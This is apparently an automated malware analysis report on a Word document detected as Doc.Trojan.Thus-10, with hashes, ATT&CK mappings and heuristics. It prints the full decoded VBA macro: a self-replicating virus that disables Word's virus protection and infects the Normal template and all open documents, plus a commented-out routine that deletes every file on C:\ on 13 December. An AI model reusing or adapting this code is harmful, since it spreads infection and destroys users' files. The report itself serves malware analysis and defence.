Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0ddc09140cf85fea…

MALICIOUS

Office (OLE)

38.5 KB Created: 2001-05-01 13:33:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 850fb0b954311ac1eac41a9cb14d1db4 SHA-1: b7fd116520b9a80c7a233c856678c59fefc3a8b3 SHA-256: 0ddc09140cf85fea5591e5c89880d4542f025419ae112f41b13005ae46eaf67a
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a critical ClamAV detection for 'Doc.Trojan.Thus-10', indicating malicious intent. The presence of a 'Document_Open' macro suggests an attempt to automatically execute malicious code when the document is opened. The VBA script appears to manipulate the NormalTemplate and other open documents to ensure its own persistence and potentially to hide its presence.

Heuristics 3

  • ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-10
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2520 bytes
SHA-256: 2d3adb0b8d5e705123fd844c475fc2be772d36da95e4113e91e7444caf23bf0f
Detection
ClamAV: Doc.Trojan.Thus-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_002'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_002'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).CodeModule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_002'" Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
    .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
    .VBComponents.Item(1).CodeModule.CountOfLines)
    End If
    Next k
    'If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    'With Application.FileSearch
     '   .NewSearch
     '   .LookIn = "C:\"
     '   .SearchSubFolders = True
     '   .FileName = "*.*"
     '   .MatchTextExactly = False
     '   .FileType = msoFileTypeAllFiles
     '   If .Execute > 0 Then
     '   For i = 1 To .FoundFiles.Count
     '   Kill .FoundFiles(i)
     '   Next i
     '   End If
    'End With
    'End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.